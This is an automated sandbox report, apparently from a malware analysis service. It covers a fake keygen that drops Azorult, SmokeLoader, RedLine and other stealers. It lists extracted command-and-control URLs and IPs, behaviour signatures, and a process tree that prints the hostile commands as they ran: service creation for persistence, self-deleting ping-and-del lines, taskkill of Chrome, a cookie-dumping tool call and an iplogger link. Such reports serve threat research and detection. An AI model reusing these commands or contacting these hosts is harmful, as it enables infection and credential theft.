Overview

overview

10

Static

static

8

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

8

ฺฺฺ�...ฺฺ

windows10_x64

3

ฺฺฺ�...ฺฺ

windows10_x64

4

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

9

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

8

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

3

ฺฺฺ�...ฺฺ

windows10_x64

1

ฺฺฺ�...ฺฺ

windows10_x64

3

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

8

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

1

ฺฺฺ�...ฺฺ

windows10_x64

1

Analysis

  • max time kernel
    284s
  • max time network
    315s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 15:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe

Score
10/10
azorultplugxredlinesmokeloadervidarnew_year_btcbackdoorbootkitdiscoveryevasioninfostealermacropersistencespywarestealertrojanupxxlm

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

NEW_YEAR_BTC

C2

86.105.252.12:35200

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Nirsoft 8 IoCs
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 34 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 20 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
    "C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
        intro.exe 1O5ZF
        3⤵
        • Executes dropped EXE
        PID:2068
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1768
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2064
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:1572
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:3132
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3040
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:2096
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2076
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:700
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3884
            • C:\Users\Admin\AppData\Local\Temp\sib826D.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sib826D.tmp\0\setup.exe" -s
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2280
              • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe
                "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
                6⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Modifies system certificate store
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2944
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  7⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:1124
                • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                  C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp1
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks whether UAC is enabled
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of SetThreadContext
                  • Checks SCSI registry key(s)
                  • Suspicious use of SetWindowsHookEx
                  PID:2328
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:2840
                  • C:\Users\Admin\AppData\Roaming\1605715653158.exe
                    "C:\Users\Admin\AppData\Roaming\1605715653158.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715653158.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:1396
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:3276
                  • C:\Users\Admin\AppData\Roaming\1605715657408.exe
                    "C:\Users\Admin\AppData\Roaming\1605715657408.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715657408.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:3488
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:564
                  • C:\Users\Admin\AppData\Roaming\1605715663049.exe
                    "C:\Users\Admin\AppData\Roaming\1605715663049.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715663049.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:1268
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:992
                  • C:\Users\Admin\AppData\Roaming\1605715665799.exe
                    "C:\Users\Admin\AppData\Roaming\1605715665799.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715665799.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:2860
                  • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                    C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:2552
                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Writes to the Master Boot Record (MBR)
                    • Suspicious use of SetWindowsHookEx
                    PID:3336
                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Writes to the Master Boot Record (MBR)
                    • Suspicious use of SetWindowsHookEx
                    PID:2968
                  • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
                    C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:2072
                    • C:\Users\Admin\AppData\Local\Temp\is-TQGP2.tmp\1021C014A4C9A552.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-TQGP2.tmp\1021C014A4C9A552.tmp" /SL5="$90038,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
                      9⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:2480
                      • C:\Program Files (x86)\RearRips\seed.sfx.exe
                        "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        PID:3568
                        • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                          "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:2464
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /c "start https://iplogger.org/14Ahe7"
                        10⤵
                        • Checks computer location settings
                        PID:3352
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                    8⤵
                      PID:912
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        9⤵
                        • Runs ping.exe
                        PID:3584
                  • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                    C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp1
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Writes to the Master Boot Record (MBR)
                    • Checks SCSI registry key(s)
                    • Suspicious use of SetWindowsHookEx
                    PID:4040
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      8⤵
                        PID:2836
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          9⤵
                          • Kills process with taskkill
                          PID:3172
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                        8⤵
                          PID:3056
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            9⤵
                            • Runs ping.exe
                            PID:2560
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
                        7⤵
                          PID:1736
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            8⤵
                            • Runs ping.exe
                            PID:1220
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
                    4⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2116
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1272
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2156
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        6⤵
                        • Kills process with taskkill
                        PID:560
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:2908
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      5⤵
                      • Executes dropped EXE
                      PID:3924
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1308
            • C:\Windows\system32\msiexec.exe
              C:\Windows\system32\msiexec.exe /V
              1⤵
              • Enumerates connected drives
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1016
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 250E69250CC581C0E4EB0CB8AD8E9B0C C
                2⤵
                • Loads dropped DLL
                PID:2624
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
              1⤵
              • Drops file in Windows directory
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:304
            • C:\Windows\system32\browser_broker.exe
              C:\Windows\system32\browser_broker.exe -Embedding
              1⤵
              • Modifies Internet Explorer settings
              PID:1692
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:3540
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies Internet Explorer settings
              • Modifies registry class
              PID:4120
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              PID:4388
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              PID:4548
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              PID:4640
            • C:\Users\Admin\AppData\Local\Temp\D5F0.exe
              C:\Users\Admin\AppData\Local\Temp\D5F0.exe
              1⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Modifies system certificate store
              PID:4904
              • C:\Windows\SysWOW64\icacls.exe
                icacls "C:\Users\Admin\AppData\Local\e53c72c0-0784-423a-8049-005ad90d254b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                2⤵
                • Modifies file permissions
                PID:412
            • C:\Users\Admin\AppData\Local\Temp\D814.exe
              C:\Users\Admin\AppData\Local\Temp\D814.exe
              1⤵
              • Executes dropped EXE
              PID:4924
            • C:\Users\Admin\AppData\Local\Temp\DCF7.exe
              C:\Users\Admin\AppData\Local\Temp\DCF7.exe
              1⤵
              • Executes dropped EXE
              PID:4952
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\llvmbdxh\
                2⤵
                  PID:640
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\clfkcbws.exe" C:\Windows\SysWOW64\llvmbdxh\
                  2⤵
                    PID:2920
                  • C:\Windows\SysWOW64\sc.exe
                    "C:\Windows\System32\sc.exe" create llvmbdxh binPath= "C:\Windows\SysWOW64\llvmbdxh\clfkcbws.exe /d\"C:\Users\Admin\AppData\Local\Temp\DCF7.exe\"" type= own start= auto DisplayName= "wifi support"
                    2⤵
                      PID:4888
                  • C:\Users\Admin\AppData\Local\Temp\E053.exe
                    C:\Users\Admin\AppData\Local\Temp\E053.exe
                    1⤵
                    • Executes dropped EXE
                    PID:4980
                  • C:\Users\Admin\AppData\Local\Temp\EBDD.exe
                    C:\Users\Admin\AppData\Local\Temp\EBDD.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:5040
                  • C:\Users\Admin\AppData\Local\Temp\F4B8.exe
                    C:\Users\Admin\AppData\Local\Temp\F4B8.exe
                    1⤵
                    • Executes dropped EXE
                    PID:4216

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/564-117-0x00007FF8F09C0000-0x00007FF8F0A3E000-memory.dmp

                    Filesize

                    504KB

                    Download

                  • memory/700-32-0x0000000010000000-0x00000000100E4000-memory.dmp

                    Filesize

                    912KB

                    Download

                  • memory/968-283-0x00000000021F0000-0x00000000021F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/992-128-0x00007FF8F09C0000-0x00007FF8F0A3E000-memory.dmp

                    Filesize

                    504KB

                    Download

                  • memory/1160-275-0x00000000022B0000-0x00000000022B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1268-122-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/1284-315-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-313-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-300-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-301-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-303-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-289-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-291-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-304-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-305-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-306-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-307-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-308-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-292-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-309-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-293-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-310-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-311-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-312-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-284-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-298-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-314-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-297-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-316-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-317-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-296-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-318-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-294-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-285-0x0000000005290000-0x0000000005291000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-286-0x0000000005290000-0x0000000005291000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-319-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-299-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-290-0x0000000005380000-0x0000000005381000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-295-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1284-302-0x0000000003190000-0x0000000003191000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1396-104-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/1704-255-0x0000000003970000-0x0000000003971000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2072-174-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2280-49-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2328-86-0x00000000039B0000-0x0000000003E61000-memory.dmp

                    Filesize

                    4.7MB

                    Download

                  • memory/2328-141-0x00000000064C0000-0x00000000064C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2328-75-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2352-271-0x0000000002D50000-0x0000000002D66000-memory.dmp

                    Filesize

                    88KB

                    Download

                  • memory/2352-192-0x0000000000B00000-0x0000000000B16000-memory.dmp

                    Filesize

                    88KB

                    Download

                  • memory/2464-189-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2464-190-0x0000000000900000-0x0000000000901000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2480-178-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2536-258-0x0000000000330000-0x0000000000345000-memory.dmp

                    Filesize

                    84KB

                    Download

                  • memory/2552-139-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2840-97-0x00007FF8F09C0000-0x00007FF8F0A3E000-memory.dmp

                    Filesize

                    504KB

                    Download

                  • memory/2840-99-0x0000000010000000-0x0000000010057000-memory.dmp

                    Filesize

                    348KB

                    Download

                  • memory/2860-133-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2944-57-0x0000000010000000-0x000000001033D000-memory.dmp

                    Filesize

                    3.2MB

                    Download

                  • memory/2944-53-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/2968-161-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/3276-109-0x00007FF8F09C0000-0x00007FF8F0A3E000-memory.dmp

                    Filesize

                    504KB

                    Download

                  • memory/3336-146-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/3488-113-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/3568-185-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/3884-45-0x0000000010B40000-0x0000000010B41000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3884-38-0x0000000072D90000-0x0000000072E23000-memory.dmp

                    Filesize

                    588KB

                    Download

                  • memory/3884-40-0x0000000071BF0000-0x00000000722DE000-memory.dmp

                    Filesize

                    6.9MB

                    Download

